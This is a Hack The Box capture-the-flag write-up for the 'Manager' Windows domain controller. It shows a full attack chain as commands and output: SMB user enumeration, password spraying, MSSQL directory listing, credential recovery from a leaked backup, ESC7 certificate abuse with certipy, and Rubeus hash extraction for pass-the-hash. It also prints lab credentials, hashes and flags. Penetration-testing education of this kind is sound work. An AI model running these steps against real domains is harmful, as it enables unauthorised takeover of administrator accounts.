Manager
Hack The Box Machine Writeup
Now this guy is looking sharp!
Summary
Manager was a interesting medium windows box that presented a very small attack surface of mostly Active Directory services and an interesting way to abuse Microsoft SQL Server. It also involved some unique aspects of Active Directory that are cool to see in a CTF box such as ADCS abuse. There was a password spray step that I was not a huge fan of however.
The quest for user.txt starts off by enumerating users using SMB. A simple password spray of the usernames as the passwords results in credentials that can be used to access a MSSQL instance. This instance allows the use of xp_dirtree that then allows the attacker to enumerate the file system and find a zip archive left in the webroot. This can then be downloaded and inside is a hidden config file that contains credentials for the raven user. These can then be used with evil-winrm to get a shell on the box and read user.txt
I found the privilege escalation to be very finicky and was not a huge fan. This is primarily due to the fact that the steps for the ESC7 vulnerability have to be completed very quickly, to the point where they all have to be executed as one command to have good success. This stems from issues with clock syncing and Kerberos. The path starts out by using certipy to enumerate that the raven user can exploit ESC7. Using certipy to exploit this vulnerability grants the attacker an administrator.pfx file. This can then be used on the Manager host along with Rubues to grant a Ticket Granting Ticket for the administrator user on the Manager host. It can also be used to grab the administrator's ntlm hash which can then be used with Evil-winrm to get a shell as administrator with a pass the hash attack. Then at last root.txt can be read on the administrator user's desktop.
Managers, am I right?
User
Recon
Nmap port scan
An nmap scan reveals that we are likely dealing with a Active Directory Domain Controller host.
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV 10.10.11.236
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 18:32 EDT
Nmap scan report for manager.htb (10.10.11.236)
Host is up (0.033s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-24 05:32:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T05:33:51+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldapssl?
|_ssl-date: 2023-10-24T05:33:51+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-24T05:33:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.99 seconds
At this point there is a very small attack surface of essentially attacking SMB on port 445. As such I will also run a scan with -p- to see if there are any ports we are missing.
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV -p- 10.10.11.236
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 21:32 EDT
Nmap scan report for manager.htb (10.10.11.236)
Host is up (0.032s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-24 08:34:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-24T07:21:32
|_Not valid after: 2053-10-24T07:21:32
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T08:36:19+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49681/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
58801/tcp open msrpc Microsoft Windows RPC
59500/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m57s, deviation: 0s, median: 6h59m57s
| smb2-time:
| date: 2023-10-24T08:35:41
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.08 seconds
This discovers a couple more things for us to interact with. Firstly there is winrm open on port 5985 that we can come back to later if we get a user account. There is also a MSSQL server open on port 1433 that we can attempt to exploit. Lastly there is a webserver on port 80.
Web server
The website has 3 tabs: Home, About, Service and Contact Us.
.JPG)
Pretty standard looking page
About and Service links to about.html and service.html and just display basic information without any intractability.
.JPG)
Some Lorem Ipsum text
Contact Us is a simple contact form that appears to not be fully implemented or sending any information.
.JPG)
The contact form does not seem to do anything
Doing a directory busting attack using Feroxbuster does not find anything of value. This means that the webserver is likely a dead-end for now and there is not much we can do with it.
At least for now
Enumerating SMB
Null and Anonymous Accesses
One of the first things I like to do when coming across SMB is check it for null or anonymous access. This can be done with smbclient using the -N flag for null auth and the -L flag to list the shares. Doing so we can see The default shares found on a DC. testing these shares for accesses we can tell this is also a dead end for now.
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //10.10.11.236/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.236 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N //10.10.11.236/NETLOGON
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
Enumerating User Names
Another thing we can often gather from SMB are usernames. This can easily be done through the use of crackmapexec and the --rid-brute flag. This will return many items, we are really only interested in the SIDTypeUser objects however as those are the users.
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u 'hackerfren' -p '' --rid-brute
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\hackerfren:
SMB 10.10.11.236 445 DC01 [+] Brute forcing RIDs
SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
<...>
MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)
Adding all of these users to a user.txt file we can then password spray against SMB to see if we can find any valid credentials for any of the users.
The gun is still the longest running unpatched 0-day
Password spray
This is a good kind of thing to have running in the background or as a last resort since it can be so time consuming. That is, unless you already have passwords as password reuse is one of the most common methods of compromise. In this case we do not. As such one thing to check is username:username as creds. Often lazy admins will just set the username to the password so that it is easy to remember.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat users.txt
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u users.txt -p users.txt
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Zhong:Cheng STATUS_LOGON_FAILURE
We will fail to find anything. However we must remember that the password may be in lowercase as well. Checking for this we find that operator:operator is a valid pair and grants us access to a user account.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat users.txt
zhong
cheng
ryan
raven
jinWoo
chinHae
operator
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u users.txt -p users.txt
<...>
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
We can then use this to check the smb shares we saw before. Unfortunately there is nothing of value in any of these.
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -U operator --password=operator \\\\10.10.11.236\\NETLOGON
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 27 06:19:07 2023
.. D 0 Thu Jul 27 06:19:07 2023
MSSQL Abuse
From here we can also access the MSSQL server we found open in the -p- nmap scan with the operator:operator credentials. MSSQL is a huge attack surface and I have found one of the best resources to help with this is Hacktricks. Doing some manual enumeration of the server using the help command (notice at the bottom of the impacket-mssqlclient output) and the Hacktricks article we deduce that we have the ability to use the xp_dirtree to list directories.
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-mssqlclient -windows-auth "operator:operator"@10.10.11.236
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
<...>
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonate
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask query
SQL (MANAGER\Operator guest@master)> xp_dirtree C:
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
From here we can also access the MSSQL server we found open in the -p- nmap scan with the operator:operator credentials. MSSQL is a huge attack surface and I have found one of the best resources to help with this is Hacktricks. Doing some manual enumeration of the server using the help command (notice at the bottom of the impacket-mssqlclient output) and the Hacktricks article we deduce that we have the ability to use the xp_dirtree to list directories.
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.11.236/website-backup-27-07-23-old.zip > backup.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1020k 100 1020k 0 0 3220k 0 --:--:-- --:--:-- --:--:-- 3230k
That's what i'm saying!
Shell as Raven
Unzipping this with the -d flag to place it into a new folder we can tell it looks like what we expect, a backup of the web server.
┌──(kali㉿kali)-[~/Desktop]
└─$ unzip -d ./backup backup.zip
Archive: backup.zip
inflating: ./backup/.old-conf.xml
inflating: ./backup/about.html
inflating: ./backup/contact.html
<...>
inflating: ./backup/index.html
inflating: ./backup/js/bootstrap.js
inflating: ./backup/js/jquery-3.4.1.min.js
inflating: ./backup/service.html
There is a hidden .old-conf.xml file that looks like it may contain useful information like credentials. Looking in this file we can find credentials for the raven user, R4v3nBe5tD3veloP3r!123.
┌──(kali㉿kali)-[~/Desktop/backup]
└─$ ls -la
total 104
<...>
-rw-r--r-- 1 kali kali 698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 kali kali 7900 Jul 27 05:32 service.html
┌──(kali㉿kali)-[~/Desktop/backup]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<...>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
We can now test these against SMB using crackmap exec to see if they are working credentials.
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123
It is also worth checking them against the Winrm port we also found open from the -p- nmap scan. It turns out the raven user does have remote management privileges and we are able to gain an interactive shell though Evil-winrm and grab user.txt
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
SMB 10.10.11.236 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:manager.htb)
HTTP 10.10.11.236 5985 DC01 [*] http://10.10.11.236:5985/wsman
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
<...>
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
35ad1378833407d82639ab3df474fbee
Ravens are based animals
Root
Enumeration
Manual
some manual enumeration looking through the file system or looking at listening tcp ports does not reveal anything of value. Nor does checking sudo permissions or looking for SUID binaries.
Winpeas
At this point it was time to resort to automatic enumeration. I used the upload function of Evil-WinRM to upload Winpeas and ran it.
*Evil-WinRM* PS C:\Users\Raven\Documents> upload winPEASany.exe
Info: Uploading /home/kali/tools/winPEASany.exe to C:\Users\Raven\Documents\winPEASany.exe
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Raven\Documents> ./winPEASany.exe
<...WinPEAS output...>
This sadly does not really reveal anything of value to use either. At this point it was time to attempt to attack the domain itself.
I always love seeing that little smiling pea
Certipy
One of the good things to quickly check for in Windows Active Directory machines is the misconfigurations of certificates that may allow for some level of exploitation. Certipy is a great tool to check for and exploit these misconfigurations all from our attacking Linux host. We can begin by using the find command to gather information about the Domain and associated certificates. Using the -vulnerable flag we limit it to only exploitable certificates.
┌──(kali㉿kali)-[~/tools]
└─$ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Saved BloodHound data to '20231023194015_Certipy.zip'
[*] Saved text output to '20231023194015_Certipy.txt'
[*] Saved JSON output to '20231023194015_Certipy.json'
┌──(kali㉿kali)-[~/tools]
└─$ cat 20231023194015_Certipy.txt
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
Towards the bottom in the Vulnerabilities section we can see that we can abuse ESC7 with the raven user.
Microsoft doing Microsoft things
ESC7
Attack 2 in the linked Hacktricks article is what we will go off of as it is using certipy. There is also an overview of the process on the certipy GitHub page. The first thing to do whenever attacking an AD domain is to sync our NTP up so that we don't run into errors. This can be done with the ntpdate command and the -u flag. We will also have to be quick or our time may desync.
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo ntpdate -u 10.10.11.236
2023-10-24 03:25:17.521951 (-0400) +25198.905645 +/- 0.016122 10.10.11.236 s1 no-leap
CLOCK: time stepped by 25198.905645
──(kali㉿kali)-[~/Desktop]
└─$ sudo ntpdate -q 10.10.11.236
2023-10-24 03:27:13.370978 (-0400) -0.000982 +/- 0.016209 10.10.11.236 s1 no-leap
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo ntpdate -q 10.10.11.236
2023-10-24 03:27:16.581508 (-0400) +25198.894906 +/- 0.017021 10.10.11.236 s1 no-leap
We will then edit the provided examples, changing the commands flag as required. This will allow us to add our Raven user as an officer.
┌──(kali㉿kali)-[~/tools]
└─$ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manger.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
We can then follow the next example command in much the same way. This will enable the SubCA template. We will then continue along with the provided examples and request a private key.
┌──(kali㉿kali)-[~/tools]
└─$ certipy ca -ca 'manager-DC01-CA' -enable-template 'SubCA' -username raven@manger.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
┌──(kali㉿kali)-[~/tools]
└─$ certipy req -ca 'manager-DC01-CA' -template SubCA -upn administrator@manager.htb -username raven@manger.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -target dc01.manager.htb
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
┌──(kali㉿kali)-[~/tools]
└─$ ls -la 13.key
-rw-r--r-- 1 kali kali 1700 Oct 23 19:50 13.key
As mentioned in the guides this command will say it fails, this is okay. We will then continue to issue the failed certificate.
┌──(kali㉿kali)-[~/Desktop]
└─$ certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
The next step is to retrieve the issued certificate.
┌──(kali㉿kali)-[~/Desktop]
└─$ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc.manager.htb -retrieve 33 -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
If you're anything like me however you would keep getting errors when attempting to issue the failed certificate. To solve these issues I simply concat all the commands into one large bash command. This way the commands are run one right after the other. Make sure to change the ID values with each attempt.
sudo ntpdate -u 10.10.11.236; certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236;certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236;certipy req -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -target 10.10.11.236 -template SubCA -upn administrator@manager.htb;certipy ca -ca 'manager-DC01-CA' -issue-request 32 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236;certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 32 -dc-ip 10.10.11.236
When you get it working correctly you will eventually get an administrator.pfx file.
┌──(kali㉿kali)-[~/Desktop]
└─$ ls -la
<...>
-rw-r--r-- 1 kali kali 2881 Oct 23 21:00 administrator.pfx
.jpg)
One of the best memes
Rubeus for TGT using PFX file
To abuse the administrator.pfx file we can upload it and a copy of the Rubeus .exe binary to the host and use it to get a TGT from which we can extract the administrator user's NTLM hash.
*Evil-WinRM* PS C:\Users\Raven\Documents> upload Rubeus.exe
Info: Uploading /home/kali/tools/Rubeus.exe to C:\Users\Raven\Documents\Rubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Raven\Documents> upload administrator.pfx
Info: Uploading /home/kali/tools/administrator.pfx to C:\Users\Raven\Documents\administrator.pfx
Data: 3840 bytes of 3840 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Raven\Documents> ./Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Raven\Documents\administrator.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
<...>
NTLM : AE5064C2F62317332C88629E025924EF
We can then pass this NTLM hash through Evil-winrm to get a shell as administrator. Lastly we grab root.txt from the administrators desktop and complete the box!
/┌──(kali㉿kali)-[~/tools]
└─$ evil-winrm -i 10.10.11.236 -u administrator -H AE5064C2F62317332C88629E025924EF
<...>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
29b134a2de37b98d9fcc85cd83f934b3
Another box down, a ton to go!
Additional Resources
Ippsec video walkthrough
youtube.com
0xdf writeup
0xdf.gitlab.io